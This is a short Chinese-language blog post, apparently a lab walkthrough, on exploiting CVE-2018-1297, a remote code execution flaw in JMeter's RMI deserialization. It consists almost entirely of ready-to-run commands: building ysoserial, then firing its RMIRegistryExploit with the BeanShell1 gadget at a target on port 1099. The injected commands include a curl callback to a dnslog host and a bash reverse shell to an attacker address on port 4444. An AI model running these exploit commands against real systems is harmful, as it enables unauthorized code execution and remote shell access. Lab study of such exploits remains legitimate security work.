Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

下载ysoserial,git

git clone https://github.com/frohoff/ysoserial.git

cd ysoserial
mvn clean package -DskipTests

cd target/

Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

 

 

执行命令

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.49.2 1099 BeanShell1 'touch /tmp/success'

Jmeter RMI 反序列化命令执行漏洞(CVE-2018-1297)

 

 

或者

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.49.2 1099 BeanShell1 'curl 8v8oop.dnslog.cn'

或者

java -cp ysoserial-0.0.6-SNAPSHOT-all.jar ysoserial.exploit.RMIRegistryExploit 192.168.49.2 1099 BeanShell1 'bash -i >& /dev/tcp/192.168.49.129/4444 0>&1'

上一篇:渗透测试-基于白名单执行payload--Odbcconf


下一篇:2018-2019-2 网络对抗技术 20165317 Exp5 MSF基础应用